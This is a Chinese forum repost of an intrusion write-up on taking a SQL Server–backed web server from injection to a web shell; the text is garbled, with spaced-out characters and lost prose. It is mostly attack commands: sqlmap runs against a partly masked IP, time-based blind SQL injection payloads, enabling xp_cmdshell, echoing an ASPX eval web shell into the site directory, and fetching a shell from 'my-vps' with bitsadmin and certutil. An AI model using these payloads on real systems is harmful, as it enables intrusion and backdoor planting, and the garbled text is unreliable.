搜索

[18102] 2020-07-26_从SQLServer注入到getshell

文档创建者:s7ckTeam
浏览次数:46
最后更新:2025-01-18
2020-07-26_从SQLServer注入到getshell   S Q L   S e r v e r     g e t s h e l l w y b 0   H A C K   2 0 2 0 - 0 7 - 2 6 0 x 0 0   w e b 1 1 1 . * . * . 6 3 0 x 0 1   访 i p   1 1 1 . * . * . 5 9 访 a n d   1 = 2 b u r p s u i t e s q l m a p p y t h o n   s q l m a p . p y   - r   1 . t x t s q l m a p [ * ]   H S O A _ 2 0 1 7 0 3 2 0 [ * ]   H S O A _ N E W [ * ]   H S O A _ T [ * ]   m a s t e r [ * ]   m o d e l [ * ]   m s d b
0 x 0 2   d b a ( d b a < s q l m a p i s - d b a > ) ( ) x p _ c m d s h e l l x p _ c m d s h e l l x p _ c m d s h e l l d i r   / s   / b   d : " a a . t x t "   f o r   / r   d :   % i   i n   ( a a . t x t )   d o   e c h o   % i j s " < s c r i p t   l a y e r . j s 使 s q l m a p - - o s - s h e l l p y t h o n   s q l m a p . p y   - r   1 . t x t   o s - s h e l l - - t e m p d b t t _ t m p s q l m a p s q l m a p   - r   1 . t x t   - - d b m s   " M i c r o s o f t   S Q L   S e r v e r "   - D   " t e m p d b "   - - t a b l e s [ * ]   m s d b [ * ]   S h u t t l e [ * ]   S H W T [ * ]   t e m p d b u n a m e = t e s t ' ; i f ( 1 = ( s e l e c t   i s _ s r v r o l e m e m b e r ( ' s y s a d m i n ' ) ) )   W A I T F O R   D E L A Y   ' 0 : 0 : 2 ' ; - - u n a m e = t e s t ' ; i f ( h o s t _ n a m e ( ) = @ @ s e r v e r n a m e )   W A I T F O R   D E L A Y   ' 0 : 0 : 5 ' ; - - u n a m e = t e s t ' ; i f ( 1 = ( s e l e c t   c o u n t ( * )   f r o m   m a s t e r . d b o . s y s o b j e c t s   w h e r e   x t y p e   =   ' x '   a n d   n a m e   =   ' x p _ c m d s h e l l ' ) )   W A I T F O R   D E L A Y   ' 0 : 0 : 2 ' - - e x e c   s p _ a d d e x t e n d e d p r o c   x p _ c m d s h e l l , @ d l l n a m e = ' x p l o g 7 0 . d l l ' e x e c   s p _ d r o p e x t e n d e d p r o c   ' x p l o g 7 0 . d l l ' #   x p _ c m d s h e l l E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' , 1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' , 0 ; R E C O N F I G U R E ; #   x p _ c m d s h e l l E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' , 1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' , 1 ; R E C O N F I G U R E ; u n a m e = t e s t ' ; u s e   t e m p d b ; c r e a t e   t a b l e   t t _ t m p   ( t m p 1   v a r c h a r ( 1 0 0 0 ) ) ; - -
t t _ t m p s q l m a p t t _ t m p :   p y t h o n   s q l m a p . p y   - r   1 . t x t   - - d b m s = " M i c r o s o f t   S Q L   S e r v e r "   - - t e c h n i q u e = S   - D   " t e m p d b "   - T   " t t _ t m p "   - C   " t m p 1 "   - - d u m p   - v   3 0 x 0 3   1 1 1 . * . * . 5 9 g e t s h e l l t x t u n a m e = t e s t ' ; u s e   t e m p d b ; i n s e r t   i n t o   t t _ t m p ( t m p 1 )   e x e c   m a s t e r . . x p _ c m d s h e l l   ' d i r   / s   / b   d : l a y e r . j s ' ; - - D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 3 . 2 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 4 . 2 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 4 . 3 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 4 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 5 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 7 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 8 0 1 0 3 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 8 0 3 2 0 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 w e b a p p C o n t e n t l a y e r D : b a k 2 0 1 7 0 2 2 6 w e b a p p Y M C o n t e n t l a y e r D : W E B A P P C o n t e n t l a y e r
访   D : b a k 2 0 1 7 0 2 2 6 w e b a p p C o n t e n t l a y e r 1 2 3 . t x t 访 h t t p : / / 1 1 1 . * . * . 5 9 / C o n t e n t / l a y e r / 1 2 3 . t x t 访 1 2 3 . t x t t e s t w e b D : b a k 2 0 1 7 0 2 2 6 w e b a p p ( <   > ^ ) 访 a a . a s p x s h e l l 使 b i t s a d m i n 访 h t t p : / / 1 1 1 . * . * . 5 9 / C o n t e n t / l a y e r / a a a . a s p x 4 0 4 使 c e r t u t i l s h e l l h t t p : / / 1 1 1 . * . * . 5 9 / C o n t e n t / l a y e r / a a a . a s p x u n a m e = t e s t ' ; e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   t e s t   > D : b a k 2 0 1 7 0 2 2 6 b a k 2 0 1 7 0 4 0 3 . 2 w e b a p p C o n t e n t l a y e r 1 1 . t x t ' ; - - u n a m e = t e s t ' ; e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   ^ < % @   P a g e   L a n g u a g e = " J s c r i p t " % ^ > ^ < % e v a l ( R e q u e s t . i t e m [ " A a 1 2 3 4 5 6 7 " ] , " u n s a f e " ) ; % ^ >   >   D : b a k 2 0 1 7 0 2 2 6 w e b a p p C o n t e n t l a y e r c c . a s p x ' ; - - u n a m e = t e s t ' ; e x e c   m a s t e r . . x p _ c m d s h e l l   ' b i t s a d m i n   / r a w r e t u r n   / t r a n s f e r   g e t f i l e   h t t p : / / m y - v p s / a a a . a s p x   D : b a k 2 0 1 7 0 2 2 6 w e b a p p C o n t e n t l a y e r a a a . a s p x ' ; - - u n a m e = t e s t ' ; e x e c   m a s t e r . . x p _ c m d s h e l l   ' c e r t u t i l   - u r l c a c h e   - s p l i t   - f   h t t p : / / m y - v p s / a a a . a s p x   D : b a k 2 0 1 7 0 2 2 6 w e b a p p C o n t e n t l a y e r a a a . a s p x ' ; - -
0 x 0 4  
1 1 1 . * . * . 6 3 1 1 1 . * . * . 5 9 0 x 0 5   s q l m a p R e f e r e n c e ( ) h t t p s : / / w w w . c n b l o g s . c o m / b a c k l i o n / p / 6 8 6 9 5 9 5 . h t m l h t t p : / / w y b 0 . c o m / p o s t s / 2 0 1 9 / s q l - s e r v e r - f r o m - i n j e c t i o n - t o - g e t s h e l l /   H A C K c a s t i s n u l l c h a r ( 3 2 ) u n i c o d e 1 0 I F ( U N I C O D E ( S U B S T R I N G ( ( S E L E C T   M I N ( I S N U L L ( C A S T ( t m p 1   A S   N V A R C H A R ( 4 0 0 0 ) ) , C H A R ( 3 2 ) ) )   F R O M   t e m p d b . d b o . t t _ t m p ) , 1 , 1 ) ) > 3 2 )   W A I T F O R   D E L A Y   ' 0 : 0 : 1 ' ; I F ( U N I C O D E ( S U B S T R I N G ( ( S E L E C T   M I N ( I S N U L L ( C A S T ( t m p 1   A S   N V A R C H A R ( 4 0 0 0 ) ) , C H A R ( 3 2 ) ) )   F R O M   t e m p d b . d b o . t t _ t m p   W H E R E   C O N V E R T ( N V A R C H A R ( 4 0 0 0 ) , t m p 1 ) > ' D : W E B A P P C o n t e n t l a y e r l a y e r . j s ' ) , 1 , 1 ) ) > 1 6 )   W A I T F O R   D E L A Y   ' 0 : 0 : 1 ' ;

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理